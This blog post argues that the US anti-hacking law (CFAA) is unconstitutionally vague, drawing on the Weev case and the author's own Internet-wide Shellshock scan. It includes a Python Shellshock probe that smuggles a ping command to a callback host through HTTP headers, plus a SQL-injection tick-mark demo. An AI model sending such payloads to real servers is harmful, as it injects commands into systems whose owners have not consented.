Friday, September 26, 2014

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written, allowing discriminatory prosecution by the powerful, such as when 'weev' was prosecuted for downloading iPad account information that AT&T had made public on its website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it gives credence to the argument that the law is unconstitutionally vague, because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).


The problem with the law is that it was written in the 1980s before the web happened. Back then, authorization meant explicit authorization. Somebody first had to tell you "yes, you can access the computer" before you were authorized. The web, however, consists of computers that are open to the public. On the web, people intentionally access computers with the full knowledge that nobody explicitly told them it was authorized. Instead, there is some vague notion of implicit authorization, that once something is opened to the public, then the public may access it.

Unfortunately, whereas explicit authorization is unambiguous, the limits of implicit authorization are undefined. We see that in the Weev case. Weev knew that AT&T did not want him to access that information, but he believed that he was nonetheless authorized because AT&T made it public. That's the tension in the law: unwanted access versus unauthorized access.

It would be easy to just say that anything the perpetrator knows is unwanted is therefore unauthorized, but that wouldn't work. Take the NYTimes, for example. They transmit a "Cookie" to your web browser in order to limit access to their site and encourage you to pay for a subscription. The NYTimes knows that you don't want the cookie, that placing the cookie on your computer is unwanted access. This unwanted access is clearly not hacking.

Note that the NYTimes used to work a different way. It blocked access until you first created an account and explicitly agreed to the cookie. Now they place the cookie on your computer without your consent.

Another example is Google. They access every public website, downloading a complete copy of each site in order to profit from other people's content. They know that many people don't want this.

Finally there is the example of advertisements, especially Flash/JavaScript ads with flashy content that really annoy us. This unwanted code is designed to get our attention -- the advertisers don't care that it annoys us, so long as we notice it. (h/t @munin).

These, and a thousand other examples, demonstrate that "unwanted but authorized" access on the public Internet is the norm.

Figuring out when public, but unwanted, access crosses the line to "unauthorized" is the key problem in the CFAA. Because it's not defined, it invites arbitrary prosecution. Weev embarrassed the powerful, not only AT&T and Apple, but the politicians whose names appeared in the results. Prosecutors therefore came up with a new interpretation of the CFAA by which to prosecute him.

A common phrase you'll hear in the law is that "ignorance of the law is no excuse". For example, a lot of hackers get tripped up by "obstruction of justice". It's a law that few know, but ignorance of it doesn't make you innocent. Barrett Brown's mother is serving a 6-month sentence for obstruction of justice because she didn't know that hiding her child's laptop during execution of a search warrant would be "obstruction of justice".

But this "ignorance of the law" thing doesn't apply to the Weev case, because everyone is ignorant of the law. Even his lawyers, planning ahead of time, wouldn't be able to figure it out. In my mass scanning of the Internet people keep telling me I need to consult with a lawyer to figure out if it's "authorized". I do talk to lawyers about it, including experts in this field. Their answer is "nobody knows". In other words, the answer is that prosecutors might be able to successfully prosecute me, but not because the law clearly says that what I'm doing is illegal, but because the law is so vague that it can be used to successfully prosecute anybody for almost anything -- like Weev.

That would be the central point of any appeal if I were arrested for scanning: that the CFAA is "void for vagueness". The law is clearly too vague for the average citizen to understand. Of course, every law suffers from a little bit of vagueness, but in the case of the CFAA, the unknown parts are extremely broad, covering virtually all public access of computers. When computers are public, as on the web, and you do something slightly unusual, there is no way for reasonable people to tell whether the conduct is "authorized" under the law. The very fact that my lawyers can't tell me whether mass scanning of the Internet is "authorized" is a clear indication that the law is too vague.

The reason vagueness causes the law to become void is that it violates due process. It endangers a person with arbitrary and discriminatory prosecution. Weev was prosecuted not because a reasonable person should have known that such access was impermissible under the CFAA, but because his actions embarrassed AT&T, Apple, and some prominent politicians like Rahm Emanuel.


Lawyers think that the word "intentional" in the CFAA isn't vague. It's the mens rea component, and is clearly defined. There are four levels of mens rea: accidental/negligent, reckless, knowing, and intentional. It's what differentiates manslaughter (negligent actions that lead to death) from murder (intentionally killing someone). The CFAA has the narrowest mens rea component, intentional. That partially resolves the problem of accessing public websites: you may not be authorized, but as long as you don't know it, your access is not illegal. Thus, you can click on the following link xyzpdq, and even though you suspect that I'm trying to trick you into accessing something you shouldn't, it's still okay, because you didn't know for certain that it was unauthorized. (Yes, that URL is designed to look like hacking, but no, I'm fairly certain it won't work, because the NSA has never had a 'cgi-bin' subdirectory according to Google.) You can "recklessly" access without authorization, but as long as it's not "intentional", you don't violate the CFAA.

Lawyers think this is clear, but it isn't. We know Weev's state of mind: he believed his actions were authorized. For one thing, all his peers in the cybersecurity community think such access is authorized. For another, he wouldn't have published the evidence of his 'crime' on Gawker if he thought it was a crime.

Yet, somehow, this isn't a mens rea defense. You can read why in the Wikipedia article on mens rea. That is merely the subjective test; the courts also apply an objective test. It's not necessarily Weev's actual intentions that matter, but the intentions of a "reasonable person". Would a reasonable person have believed that accessing AT&T's servers that way was unauthorized?

This test is bonkers for computers, because a "reasonable person" means an "ignorant person". Reasonable people who know how the web works, who have read RFC 2616, believe Weev's actions are clearly authorized. Other reasonable people who know nothing except how to access Facebook with an iPad often believe otherwise -- and it's the iPad users the court relies upon for "reasonable person".

If you are on a desktop/laptop, you are reading this blogpost in a browser. At the top of your browser is the URL field. You can click on this field and edit it. When presented with a URL like "http://example.com/?articleId=5", you know you can edit the URL, changing the '5' to a '6', and thereby access the next article in the sequence. Reasonable people who know how the web works do this routinely -- we know the URL field is there for exactly this reason. Ignorant-but-reasonable people who don't know how computers work have never edited the URL. To the ignorant, the URL is some incomprehensible detail that nobody would ever edit, and anyone who did edit it must be "hacking".
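
To make the mechanics concrete, here is a trivial sketch of that kind of URL editing done programmatically, using Python's standard library. The URL and the 'articleId' parameter are just the made-up example from the paragraph above, not any particular site.

    # A trivial sketch of "editing the URL": bump the (hypothetical) articleId
    # query parameter to request the next article in the sequence. This does
    # exactly what a person does by hand in the browser's URL field.
    from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

    def next_article(url: str) -> str:
        parts = urlparse(url)
        query = parse_qs(parts.query)
        query["articleId"] = [str(int(query["articleId"][0]) + 1)]
        return urlunparse(parts._replace(query=urlencode(query, doseq=True)))

    print(next_article("http://example.com/?articleId=5"))
    # prints: http://example.com/?articleId=6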

In legal terms, this means that the mens rea for the CFAA is actually "strict liability". Your actual intentions are irrelevant, because it's the intentions of the ignorant that matter. And the ignorant think anything other than clicking on links is unauthorized. Hence, editing the URL field is "intentional unauthorized access".

I have this fantasy that one day Tim Berners-Lee (the designer of the web) gets prosecuted for incrementing the URL to access the next article. In the debate about "how the web works" and "what does authorization mean", Tim will be referring to RFC 2616, which he co-authored. However, he'll be found guilty because the ignorant people in the jury box, consisting of his 'reasonable' peers, think it works a different way. Tim will say "I designed the web so that people could increment the URL", whereas the jury will claim "no reasonable person would ever increment the URL".

What we have is something akin to the Salem Witch Trials, where a reasonable jury of their peers convicted people for practicing witchcraft. To the average person on the street, computers work by magic, and those who do strange things are practicing witchcraft. Weev was convicted of witchcraft, and nothing more.


That brings me back to my scan of the Internet for the Shellshock bug. The facts are not in doubt. I document exactly what I sent to the web servers. That I didn't intend to "hack" the servers and believed my access was "authorized" is likewise clear.

Some of my peers are uncomfortable, though, because the nature of the access is unusual. But they haven't thought things through. This isn't a buffer-overflow remote-code execution, where data becomes code contrary to the expectations of the programmer. Instead, it's code execution according to the intentions of the programmer: Shellshock is a feature whose defined intent was to execute code. Indeed, Shellshock is fixed by removing a feature from bash that has been in use for 20 years. That servers are misconfigured in a way that exposes this feature doesn't make accessing it unauthorized.

Furthermore, there is the "thereby obtains information" clause. If my command were "cat /etc/passwd", I can understand there'd be an issue. In the Weev case, it's clear that the programmers intended for the iPad account information to be public, but it's clear in this case that nobody intends "/etc/passwd" to be public. But I don't use Shellshock to get the password file; I use 'ping', because pinging is clearly authorized -- pings are a normal, accepted interaction between two computers on the Internet.
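
For concreteness, here is a minimal sketch of what such a test request looks like -- not my exact scan payload, and the callback address (192.0.2.1, a reserved documentation address) is purely illustrative. The "() { :; };" string is the well-known Shellshock trigger: a vulnerable server hands the header to bash as an environment variable, and bash executes the trailing command, here a single ping back to the tester.

    # Minimal sketch of a Shellshock test request (illustrative only; not the
    # exact payload from my scan). The headers carry the classic trigger string;
    # if the server hands them to a vulnerable bash, the trailing command runs:
    # a single harmless ping to a callback host, proving the bug without reading
    # any files. 192.0.2.1 is a documentation-only address used as a placeholder.
    import socket

    PAYLOAD = "() { :; }; /bin/ping -c 1 192.0.2.1"

    def probe(host: str, port: int = 80) -> bytes:
        request = (
            "GET / HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            f"User-Agent: {PAYLOAD}\r\n"
            f"Cookie: {PAYLOAD}\r\n"
            f"Referer: {PAYLOAD}\r\n"
            "\r\n"
        )
        with socket.create_connection((host, port), timeout=5) as s:
            s.sendall(request.encode("ascii"))
            return s.recv(4096)  # the HTTP reply matters less than the ping-back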

If you want to claim that all "code execution" is invalid, then a lot of what we do becomes invalid. For example, our community routinely adds a tick mark ' onto URLs to test for SQL injection. That's technically code execution. By pasting our strings into their SQL queries, website programmers have implicitly authorized us to run some SQL code, like tick marks. It doesn't mean they've authorized us to execute all code, like getting the password file, or doing the famous "; DROP TABLE Students". But it does mean that they've authorized the principle of running code -- which is why we put tick marks in URLs with reckless abandon. Heck, when websites are broken, we'll write entire SQL queries to get at the information in our own accounts that we believe we are authorized to see.
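
As a hedged illustration of why a single tick mark is a test rather than an attack: in the insecure pattern where user input is pasted straight into the SQL text, the quote breaks the query's syntax and the database throws an error, and that error is the signal testers look for. The table and values below are hypothetical.

    # Illustration of the tick-mark test against a naively built query.
    # The table and parameter are hypothetical; the point is only that a stray
    # single quote produces a syntax error when input is pasted into the SQL.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT)")

    def lookup(article_id: str):
        # Insecure pattern: input concatenated directly into the query text.
        return conn.execute(
            f"SELECT title FROM articles WHERE id = {article_id}"
        ).fetchall()

    lookup("5")          # a normal request works
    try:
        lookup("5'")     # the tick mark breaks the syntax
    except sqlite3.OperationalError as err:
        print("injection indicator:", err)

The fix on the server side is, of course, parameterized queries; the sketch exists only to show what the tick mark reveals, not how to exploit it.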

At least, that's the narrow reading of the CFAA we've all been using: when they make a website public, and they've configured certain features (albeit without full understanding of their actions), then we feel authorized to use them. It's their responsibility to make things explicitly unauthorized, not our responsibility to figure out what's been implicitly authorized. If they put a password on it, we recognize that as "authorization", and we don't try to bypass the password even if we can (even with URL editing, even with SQL code). Conversely, when it's public, we treat things as public. We have simple criteria: "authorized means explicit" and "public means public".


I know that I'm at risk of prosecution under the CFAA, but somebody has to do this. Unless security researchers are free of the chilling effects of the law, Chinese cyberwarriors and cyberterrorists will devastate our country. More importantly, the CFAA is unconstitutionally vague, violating due process, and somebody has to defend the constitution. I can handle getting prosecuted, so I'm willing to stick my neck out.



Update: The point I'm trying to make about 'mens rea' is that it doesn't resolve the ambiguity over "authorization". Some people have claimed that the law isn't void for vagueness, because 'intent' clarifies things. It doesn't. All access is intentional, it's authorization that's the question. If I think I'm authorized, but the law disagrees, then "ignorance-of-law-is-no-excuse" trumps "I thought I was authorized", thus we are right back at strict liability. Only in the case of recklessly clicking on web links is there a difference. Anything more complex that technical people do collapses to ill-intentioned witchcraft.


2 comments:

  1. I hereby formally disqualify myself from acting as an expert witness in your trial by voicing my 100% support for your position Rob!

  2. That's it brother. Someone needs to challenge it; we cannot assume that everyone is tarred with the same brush! Do not feed trolls. Greetings.

